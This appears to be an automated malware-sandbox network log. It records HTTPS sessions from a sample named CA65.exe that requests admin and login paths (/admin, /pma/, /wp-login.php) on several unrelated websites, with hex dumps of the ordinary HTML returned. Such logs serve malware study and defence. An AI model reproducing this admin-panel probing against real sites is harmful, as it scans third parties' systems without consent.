3d 20 66 61 6c 73 Data Ascii: 7ffa<script type="text/javascript">(function(window) {window.FS.currentPage = {dateFormat: 'md',homepageVideoOptimization: true,timeFormat: '12'};const settings = FS.getNS('settings');settings.styleManagerEnabled = fals
2023-12-22 20:15:07 UTC	1369	IN	Data Raw: 61 73 2d 73 65 61 72 63 68 2d 63 6f 6e 74 61 69 6e 65 72 22 20 69 64 3d 22 66 73 45 6c 5f 32 30 31 30 22 20 64 61 74 61 2d 75 73 65 2d 6e 65 77 3d 22 74 72 75 65 22 20 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 73 45 6c 65 6d 65 6e 74 43 6f 6e 74 65 6e 74 22 20 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 73 45 6c 65 6d 65 6e 74 20 66 73 45 6d 62 65 64 20 6f 66 66 63 61 6e 76 61 73 2d 73 65 61 72 63 68 2d 62 75 74 74 6f 6e 22 20 69 64 3d 22 66 73 45 6c 5f 32 30 31 31 22 20 64 61 74 61 2d 75 73 65 2d 6e 65 77 3d 22 74 72 75 65 22 20 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 73 45 6c 65 6d 65 6e 74 43 6f 6e 74 65 6e 74 22 20 3e 0a 09 09 20 20 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d Data Ascii: as-search-container" id="fsEl_2010" data-use-new="true" ><div class="fsElementContent" ><div class="fsElement fsEmbed offcanvas-search-button" id="fsEl_2011" data-use-new="true" ><div class="fsElementContent" > <button class="search-
2023-12-22 20:15:07 UTC	1369	IN	Data Raw: 2f 77 77 77 2e 6c 69 62 65 72 74 79 32 35 2e 6f 72 67 2f 73 65 61 72 63 68 2d 72 65 73 75 6c 74 73 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 20 6e 6f 76 61 6c 69 64 61 74 65 3d 22 6e 6f 76 61 6c 69 64 61 74 65 22 3e 3c 6c 61 62 65 6c 20 63 6c 61 73 73 3d 22 66 73 46 69 65 6c 64 4c 61 62 65 6c 22 20 66 6f 72 3d 22 66 73 53 65 61 72 63 68 49 6e 70 75 74 5f 32 33 31 36 22 3e 53 65 61 72 63 68 3c 2f 6c 61 62 65 6c 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 73 53 65 61 72 63 68 45 6c 65 6d 65 6e 74 4b 65 79 77 6f 72 64 22 3e 3c 69 6e 70 75 74 20 63 6c 61 73 73 3d 22 66 73 53 74 79 6c 65 53 65 61 72 63 68 46 69 65 6c 64 20 66 73 53 74 79 6c 65 44 65 66 61 75 6c 74 46 69 65 6c 64 22 20 69 64 3d 22 66 73 53 65 61 72 63 68 49 6e 70 75 74 5f 32 33 31 36 22 20 6e 61 Data Ascii: /www.liberty25.org/search-results" method="get" novalidate="novalidate"><label class="fsFieldLabel" for="fsSearchInput_2316">Search</label><div class="fsSearchElementKeyword"><input class="fsStyleSearchField fsStyleDefaultField" id="fsSearchInput_2316" na
2023-12-22 20:15:07 UTC	1369	IN	Data Raw: 65 73 22 3e 44 69 73 74 72 69 63 74 20 53 65 72 76 69 63 65 73 3c 2f 61 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 73 4e 61 76 50 61 67 65 49 6e 66 6f 22 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 66 73 4e 61 76 4c 65 76 65 6c 33 22 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 61 62 6f 75 74 2d 6c 69 62 65 72 74 79 2f 64 69 73 74 72 69 63 74 2d 73 65 72 76 69 63 65 73 2f 61 74 68 6c 65 74 69 63 73 2d 61 6e 64 2d 61 63 74 69 76 69 74 69 65 73 22 3e 41 74 68 6c 65 74 69 63 73 20 26 61 6d 70 3b 20 41 63 74 69 76 69 74 69 65 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 66 73 4e 61 76 50 61 72 65 6e 74 50 61 67 65 22 3e 3c 61 20 68 72 65 66 3d 22 2f 61 62 6f 75 74 2d 6c 69 62 65 72 74 79 2f 64 69 73 74 72 69 63 74 2d 73 65 72 76 69 63 65 73 2f 62 75 Data Ascii: es">District Services</a><div class="fsNavPageInfo"><ul class="fsNavLevel3"><li><a href="/about-liberty/district-services/athletics-and-activities">Athletics & Activities</a></li><li class="fsNavParentPage"><a href="/about-liberty/district-services/bu
2023-12-22 20:15:07 UTC	1369	IN	Data Raw: 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 66 73 4e 61 76 50 61 72 65 6e 74 50 61 67 65 22 3e 3c 61 20 68 72 65 66 3d 22 2f 61 62 6f 75 74 2d 6c 69 62 65 72 74 79 2f 64 69 73 74 72 69 63 74 2d 73 65 72 76 69 63 65 73 2f 68 65 61 6c 74 68 2d 73 65 72 76 69 63 65 73 22 3e 48 65 61 6c 74 68 20 53 65 72 76 69 63 65 73 3c 2f 61 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 73 4e 61 76 50 61 67 65 49 6e 66 6f 22 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 66 73 4e 61 76 4c 65 76 65 6c 34 22 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 61 62 6f 75 74 2d 6c 69 62 65 72 74 79 2f 64 69 73 74 72 69 63 74 2d 73 65 72 76 69 63 65 73 2f 68 65 61 6c 74 68 2d 73 65 72 76 69 63 65 73 2f 69 6c 6c 6e 65 73 73 2d 61 6e 64 2d 61 74 74 65 6e 64 61 6e 63 65 22 3e 49 6c 6c 6e 65 73 73 20 61 6e 64 Data Ascii: ><li class="fsNavParentPage"><a href="/about-liberty/district-services/health-services">Health Services</a><div class="fsNavPageInfo"><ul class="fsNavLevel4"><li><a href="/about-liberty/district-services/health-services/illness-and-attendance">Illness and
2023-12-22 20:15:07 UTC	1369	IN	Data Raw: 67 72 61 6e 74 20 45 64 75 63 61 74 69 6f 6e 20 50 72 6f 67 72 61 6d 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 61 62 6f 75 74 2d 6c 69 62 65 72 74 79 2f 64 69 73 74 72 69 63 74 2d 73 65 72 76 69 63 65 73 2f 73 70 65 63 69 61 6c 2d 73 65 72 76 69 63 65 73 2f 73 65 63 74 69 6f 6e 2d 35 30 34 22 3e 53 65 63 74 69 6f 6e 20 35 30 34 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 61 62 6f 75 74 2d 6c 69 62 65 72 74 79 2f 64 69 73 74 72 69 63 74 2d 73 65 72 76 69 63 65 73 2f 73 70 65 63 69 61 6c 2d 73 65 72 76 69 63 65 73 2f 73 70 65 63 69 61 6c 2d 65 64 75 63 61 74 69 6f 6e 22 3e 53 70 65 63 69 61 6c 20 45 64 75 63 61 74 69 6f 6e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 64 69 76 3e 3c 2f 6c 69 3e 3c 6c 69 Data Ascii: grant Education Program</a></li><li><a href="/about-liberty/district-services/special-services/section-504">Section 504</a></li><li><a href="/about-liberty/district-services/special-services/special-education">Special Education</a></li></ul></div></li><li
2023-12-22 20:15:07 UTC	1369	IN	Data Raw: 72 74 79 2f 73 74 72 61 74 65 67 69 63 2d 70 6c 61 6e 22 3e 53 74 72 61 74 65 67 69 63 20 50 6c 61 6e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 61 62 6f 75 74 2d 6c 69 62 65 72 74 79 2f 73 75 70 65 72 69 6e 74 65 6e 64 65 6e 74 73 2d 6f 66 66 69 63 65 22 3e 53 75 70 65 72 69 6e 74 65 6e 64 65 6e 74 e2 80 99 73 20 4f 66 66 69 63 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 64 69 76 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 66 73 4e 61 76 50 61 72 65 6e 74 50 61 67 65 22 3e 3c 61 20 68 72 65 66 3d 22 2f 6c 65 61 72 6e 69 6e 67 22 3e 4c 65 61 72 6e 69 6e 67 3c 2f 61 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 73 4e 61 76 50 61 67 65 49 6e 66 6f 22 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 66 73 4e 61 76 4c 65 76 65 6c 32 22 Data Ascii: rty/strategic-plan">Strategic Plan</a></li><li><a href="/about-liberty/superintendents-office">Superintendents Office</a></li></ul></div></li><li class="fsNavParentPage"><a href="/learning">Learning</a><div class="fsNavPageInfo"><ul class="fsNavLevel2"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
226	192.168.2.4	50144	104.26.6.37	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:06 UTC	203	OUT	GET /domain_profile.cfm?d=yuejichem.com HTTP/1.1 Host: www.hugedomains.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:06 UTC	871	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:15:06 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close cache-control: private vary: Accept-Encoding set-cookie: site_version_phase=108; expires=Mon, 16-Dec-2024 20:15:06 GMT; path=/ set-cookie: site_version=HDv3; expires=Mon, 16-Dec-2024 20:15:06 GMT; path=/ set-cookie: captcha-tracker=; expires=Thu, 21-Dec-2023 20:15:06 GMT; path=/ x-powered-by: ASP.NET lb: TclPrdLbHd3 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JvcTLlJHmtXbCCVzQxMgzIwElkYwYw5cI7zFl4dVXR0zasnKmib3GLHJPidBjc5vcxrZ3ySfUhkEoeQflqt7LnHPQnafoRG%2BDrdaYUPg0SVfzOyOKFm2ALDvBauUiV7YZeJV%2BaY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b08f2ac456c87-MIA
2023-12-22 20:15:06 UTC	498	IN	Data Raw: 31 61 65 33 0d 0a 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 67 68 2f 66 61 6e 63 79 61 70 70 73 2f 66 61 6e 63 79 62 6f 78 40 33 2e 35 2e 37 2f 64 69 73 74 2f 6a 71 75 65 72 79 2e 66 Data Ascii: 1ae3<!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.f
2023-12-22 20:15:06 UTC	1369	IN	Data Raw: 2f 73 74 61 74 69 63 2e 68 75 67 65 64 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 3f 72 3d 32 30 32 30 31 31 30 35 61 22 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 61 70 69 2e 6a 73 22 20 61 73 79 6e 63 20 64 65 66 65 72 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 55 41 2d 37 31 31 37 33 33 39 2d 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e Data Ascii: /static.hugedomains.com/css/hdv3-css/responsive.css?r=20201105a"><script src="https://www.google.com/recaptcha/api.js" async defer></script><script async src="https://www.googletagmanager.com/gtag/js?id=UA-7117339-4"></script><script> window.
2023-12-22 20:15:06 UTC	1369	IN	Data Raw: 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 3c 6d 61 69 6e 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6d 61 69 6e 20 66 6c 61 74 2d 68 65 61 64 65 72 22 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 62 6f 75 74 2d 70 61 67 65 20 67 75 69 64 65 2d 68 6f 6d 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 64 65 66 61 75 6c 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 2d 66 6c 65 78 20 61 69 2d 73 74 61 72 74 20 63 68 65 63 6b 6f 75 74 2d 62 6f 64 79 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 68 65 63 6b 6f 75 74 2d 63 6f 6e 74 65 6e 74 20 66 75 6c 6c 2d 77 69 64 74 68 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 62 6f 75 74 2d 70 61 67 65 2d 63 6f 6e 74 65 6e Data Ascii: iv></div></header><main class="site-main flat-header"><section class="about-page guide-home"><div class="container default"><div class="d-flex ai-start checkout-body"><div class="checkout-content full-width-container"><div class="about-page-conten
2023-12-22 20:15:06 UTC	1369	IN	Data Raw: 3d 22 63 69 72 63 75 6c 61 72 47 5f 34 22 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 47 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 63 69 72 63 75 6c 61 72 47 5f 35 22 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 47 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 63 69 72 63 75 6c 61 72 47 5f 36 22 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 47 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 63 69 72 63 75 6c 61 72 47 5f 37 22 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 47 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 63 69 72 63 75 6c 61 72 47 5f 38 22 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 47 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 2f Data Ascii: ="circularG_4" class="circularG"></div><div id="circularG_5" class="circularG"></div><div id="circularG_6" class="circularG"></div><div id="circularG_7" class="circularG"></div><div id="circularG_8" class="circularG"></div></div></button></form></
2023-12-22 20:15:06 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 66 6f 72 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 61 70 74 63 68 61 2d 66 6f 72 6d 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 61 70 74 63 68 61 2d 73 75 62 6d 69 74 2d 62 75 74 74 6f 6e 22 29 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 73 75 62 6d 69 74 42 75 74 74 6f 6e 20 3d 20 74 68 69 73 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 73 75 62 6d 69 74 53 70 69 6e 6e 65 72 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 Data Ascii: var form = document.getElementById("captcha-form"); document.getElementById("captcha-submit-button").addEventListener("click", function () { var submitButton = this; var submitSpinner = document.ge
2023-12-22 20:15:06 UTC	917	IN	Data Raw: 74 66 6f 72 6d 2f 73 63 72 69 70 74 73 2f 6a 73 64 2f 6d 61 69 6e 2e 6a 73 27 2c 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 5f 63 70 6f 29 3b 22 3b 76 61 72 20 5f 30 78 68 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 69 66 72 61 6d 65 27 29 3b 5f 30 78 68 2e 68 65 69 67 68 74 20 3d 20 31 3b 5f 30 78 68 2e 77 69 64 74 68 20 3d 20 31 3b 5f 30 78 68 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 20 3d 20 27 61 62 73 6f 6c 75 74 65 27 3b 5f 30 78 68 2e 73 74 79 6c 65 2e 74 6f 70 20 3d 20 30 3b 5f 30 78 68 2e 73 74 79 6c 65 2e 6c 65 66 74 20 3d 20 30 3b 5f 30 78 68 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 20 3d 20 Data Ascii: tform/scripts/jsd/main.js',document.getElementsByTagName('head')[0].appendChild(_cpo);";var _0xh = document.createElement('iframe');_0xh.height = 1;_0xh.width = 1;_0xh.style.position = 'absolute';_0xh.style.top = 0;_0xh.style.left = 0;_0xh.style.border =
2023-12-22 20:15:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
227	192.168.2.4	50099	34.136.28.237	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:06 UTC	169	OUT	GET /pma/ HTTP/1.1 Host: ispsolucoes.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:06 UTC	828	IN	HTTP/1.1 200 OK x-guploader-uploadid: ABPtcPqPtwZ-bk8FFTzlnlDmYsmIsDMFcENyMBShcW2s5YeQfrx3UxKfSPz95RuHoMfvryGicwE date: Fri, 22 Dec 2023 20:15:06 GMT Cache-Control: max-age=3600 expires: Sat, 21 Dec 2024 20:15:06 GMT last-modified: Wed, 29 Nov 2023 21:27:35 GMT etag: W/"6cb298b6f5886c6f0163450b2833fa5e" vary: Accept-Encoding x-goog-generation: 1701293255952775 x-goog-metageneration: 1 x-goog-stored-content-encoding: gzip x-goog-stored-content-length: 1195 content-type: text/html x-goog-hash: crc32c=rey8dw==, md5=bLKYtvWIbG8BY0ULKDP6Xg== x-goog-storage-class: STANDARD access-control-allow-origin: * access-control-expose-headers: Content-Type x-guploader-response-body-transformations: gunzipped warning: 214 UploadServer gunzipped transfer-encoding: chunked server: UploadServer connection: close
2023-12-22 20:15:06 UTC	2888	IN	Data Raw: 62 33 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 21 2d 2d 0a 20 20 20 20 49 66 20 79 6f 75 20 61 72 65 20 73 65 72 76 69 6e 67 20 79 6f 75 72 20 77 65 62 20 61 70 70 20 69 6e 20 61 20 70 61 74 68 20 6f 74 68 65 72 20 74 68 61 6e 20 74 68 65 20 72 6f 6f 74 2c 20 63 68 61 6e 67 65 20 74 68 65 0a 20 20 20 20 68 72 65 66 20 76 61 6c 75 65 20 62 65 6c 6f 77 20 74 6f 20 72 65 66 6c 65 63 74 20 74 68 65 20 62 61 73 65 20 70 61 74 68 20 79 6f 75 20 61 72 65 20 73 65 72 76 69 6e 67 20 66 72 6f 6d 2e 0a 0a 20 20 20 20 54 68 65 20 70 61 74 68 20 70 72 6f 76 69 64 65 64 20 62 65 6c 6f 77 20 68 61 73 20 74 6f 20 73 74 61 72 74 20 61 6e 64 20 65 6e 64 20 77 69 74 68 20 61 20 73 6c 61 73 68 20 22 2f 22 20 Data Ascii: b3c<!DOCTYPE html><html><head> ... If you are serving your web app in a path other than the root, change the href value below to reflect the base path you are serving from. The path provided below has to start and end with a slash "/"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
228	192.168.2.4	50294	104.17.166.123	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:06 UTC	397	OUT	GET /admin HTTP/1.1 Host: www.liberty25.org Accept: / Accept-Encoding: deflate, gzip Cookie: __cfruid=1328995e49fbc51fc6024f7573c2ef9146b1803b-1703276101; __cf_bm=HjiJGtjSbkOb_mOJXPP9wzC_xzRlEub0zC2nnAEGs4Y-1703276101-1-AdD76OTw88m1809C/x2Xgx8g5LRKBcubp/SLUvgQwRq93WYgcmG7/aOz5aBWU/9sb4T9JN+5QmfEGqo1Y7motmc= User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:07 UTC	395	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:15:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Location: http://www.liberty25.org/admin/ CF-Ray: 839b08f3de5e8de4-MIA CF-Cache-Status: MISS Strict-Transport-Security: max-age=31536000 Vary: Accept-Encoding X-Powered-By: ASP.NET Server: cloudflare alt-svc: h3=":443"; ma=86400
2023-12-22 20:15:07 UTC	533	IN	Data Raw: 32 30 65 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 62 65 72 74 79 32 35 2e 6f 72 67 2f 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 3c 73 63 72 69 70 74 20 64 65 66 65 72 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 63 6c 6f 75 64 66 6c 61 72 65 69 6e 73 69 67 68 74 73 2e 63 6f 6d 2f 62 65 61 63 6f 6e 2e 6d 69 6e 2e 6a 73 2f 76 38 34 61 33 61 34 30 31 32 64 65 39 34 63 65 31 61 36 38 36 62 61 38 63 31 36 37 63 33 35 39 Data Ascii: 20e<head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="http://www.liberty25.org/admin/">here</a><script defer src="https://static.cloudflareinsights.com/beacon.min.js/v84a3a4012de94ce1a686ba8c167c359
2023-12-22 20:15:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
229	192.168.2.4	50280	50.31.65.5	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:06 UTC	178	OUT	GET /wp-login.php HTTP/1.1 Host: saltdelcolom.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:08 UTC	555	IN	HTTP/1.1 200 OK Connection: close x-powered-by: PHP/7.3.33 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 set-cookie: wordpress_test_cookie=WP+Cookie+check; path=/; secure x-frame-options: SAMEORIGIN transfer-encoding: chunked date: Fri, 22 Dec 2023 20:15:08 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2023-12-22 20:15:08 UTC	813	IN	Data Raw: 32 31 62 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 45 6e 74 72 61 20 26 6c 73 61 71 75 6f 3b 20 53 61 6c 74 20 64 65 6c 20 43 6f 6c 6f 6d 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 2c 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 61 72 63 68 69 76 Data Ascii: 21b7<!DOCTYPE html><html lang="ca"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Entra &lsaquo; Salt del Colom — WordPress</title><meta name='robots' content='max-image-preview:large, noindex, noarchiv
2023-12-22 20:15:08 UTC	7826	IN	Data Raw: 73 3a 2f 2f 73 61 6c 74 64 65 6c 63 6f 6c 6f 6d 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 6f 67 69 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 32 2e 33 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 65 66 65 72 72 65 72 27 20 63 6f 6e 74 65 6e 74 3d 27 73 74 72 69 63 74 2d 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 2d 6f 72 69 67 69 6e 27 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 61 6c 74 64 65 6c 63 6f 6c 6f 6d 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 Data Ascii: s://saltdelcolom.com/wp-admin/css/login.min.css?ver=6.2.3' media='all' /><meta name='referrer' content='strict-origin-when-cross-origin' /><meta name="viewport" content="width=device-width" /><link rel="icon" href="https://saltdelcolom.com/wp-conte
